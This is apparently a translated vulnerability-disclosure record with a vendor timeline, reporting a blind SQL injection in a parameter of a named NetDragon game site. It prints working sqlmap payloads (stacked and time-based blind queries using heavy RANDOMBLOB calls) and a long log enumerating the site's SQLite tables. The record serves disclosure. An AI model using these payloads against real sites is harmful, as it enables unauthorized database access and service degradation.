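2015-10-13: Details reported to the vendor; awaiting vendor response
2015-10-14: Vendor confirmed; details disclosed to the vendor only
2015-10-24: Details disclosed to core white hats and experts in related fields
2015-11-03: Details disclosed to regular white hats
2015-11-13: Details disclosed to intern white hats
2015-11-28: Details disclosed to the public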
Blind SQL injection vulnerability on a NetDragon site
http://ty.top.99.com/userlevel.aspx?pro=20
Parameter: pro (GET)
    Type: stacked queries
    Title: SQLite > 2.0 stacked queries (heavy query - comment)
    Payload: pro=20;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))--

    Type: AND/OR time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: pro=20 AND 8822=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
---
[22:04:08] [INFO] the back-end DBMS is SQLite
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: SQLite
[22:04:08] [INFO] fetching tables for database: 'SQLite_masterdb'
[22:04:08] [INFO] fetching number of tables for database 'SQLite_masterdb'
[22:04:08] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[22:04:19] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:04:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
25
[22:06:21] [INFO] retrieved: server
[22:18:00] [INFO] retrieved: dbbrushtimestam
[22:49:55] [ERROR] invalid character detected. retrying..
p
[22:52:57] [INFO] retrieved: userl
[23:06:35] [ERROR] invalid character detected. retrying..
evelsort
[23:23:44] [INFO] retrieved: sqlite_A
[23:38:27] [INFO] retrieved:
[23:39:58] [ERROR] invalid character detected. retrying..
a
[23:44:31] [ERROR] invalid character detected. retrying..
sermoneysort
[00:09:51] [INFO] retrieved: eudemonsort
[00:35:33] [ERROR] invalid character detected. retrying..
_All
[00:43:41] [INFO] retrieved: eudemonsort_World
[01:20:31] [INFO] retrieved: eudemonsort_Area_5
[01:55:26] [INFO] retrieved: eudemonsort_Area_6
[02:30:48] [INFO] retrieved: eudemonsor
[03:05:29] [ERROR] invalid character detected. retrying..
'
_Area_15
[03:24:41] [INFO] retrieved: eudemonsort_Area_16
[04:01:03] [INFO] retrieved: eudemonsort_Ar
[04:29:23] [INFO] retrieved:
[04:30:55] [ERROR] invalid character detected. retrying..
eudemonsoqt_S
[05:01:12] [ERROR] invalid character detected. retrying..
[05:04:20] [ERROR] invalid character detected. retrying..
erver_13
[05:19:01] [INFO] retrieved: eudemonsort_Server_25
[06:01:27] [INFO] retrieved: eudemonsort_Server_68
[06:45:20] [INFO] retrieved: eudemonsort_Server_78
[07:29:14] [INFO] retrieved: eudemonsort_Serve
[08:06:33] [ERROR] invalid character detected. retrying..
[08:10:05] [ERROR] invalid character detected. retrying..
[08:12:48] [ERROR] invalid character detected. retrying..
r_79
[08:20:53] [INFO] retrieved: eudemonsort_Server_8
[09:04:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
7
[09:04:31] [INFO] retrieved:
[09:04:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:04:32] [INFO] retrieved:
[09:04:32] [INFO] retrieved:
[09:04:33] [INFO] retrieved:
[09:04:34] [INFO] retrieved:
[09:04:34] [INFO] retrieved:
[09:04:35] [INFO] retrieved:
Database: SQLite_masterdb
[18 tables]
+-------------------------+
| asermoneysort           |
| dbbrushtimestamp        |
| eudemonsoqt_Server_13   |
| eudemonsor'\x00_Area_15 |
| eudemonsort_All         |
| eudemonsort_Ar          |
| eudemonsort_Area_16     |
| eudemonsort_Area_5      |
| eudemonsort_Area_6      |
| eudemonsort_Server_25   |
| eudemonsort_Server_68   |
| eudemonsort_Server_78   |
| eudemonsort_Server_79   |
| eudemonsort_Server_87   |
| eudemonsort_World       |
| server                  |
| sqlite_A                |
| userlevelsort           |
+-------------------------+
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-14 09:27
Thanks to 路人甲 for the support
None yet